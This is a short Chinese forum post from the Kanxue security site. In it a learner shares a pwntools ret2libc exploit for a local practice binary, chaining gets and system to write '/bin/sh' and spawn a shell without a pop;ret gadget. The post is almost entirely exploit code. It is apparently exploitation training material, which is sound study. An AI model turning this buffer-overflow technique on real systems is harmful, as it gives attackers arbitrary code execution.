经过两个小时的调试。。我终于找到了不需要 pop ；ret的方法，少了个局限性。-看雪学苑-看雪-安全培训|安全招聘|www.kanxue.com

经过两个小时的调试。。我终于找到了不需要 pop ；ret的方法，少了个局限性。

Student 2023-5-23 971

提问者：
hack_xolin 2021-4-11
经过两个小时的调试。。我终于找到了不需要 pop ；ret的方法，少了个局限性。
EXP如下：

from  pwn  import  *
 
context.log_level  =  "debug"
p  =  process("./ret2libc2_last")
e  =  ELF("./ret2libc2_last")
 
systemAddr  =  e.symbols["system"]
getsAddr  =  e.plt["gets"]
offset  =  112
binAddr  =  0x804b000  -  0x10
 
payload  =  offset  *  "A"  +  p32(getsAddr)  +  p32(systemAddr)  +  p32(binAddr)  +  p32(binAddr)
pause()
p.sendlineafter("What  do  you  think  ?",  payload)
 
p.sendline("/bin/sh\x00")
p.interactive()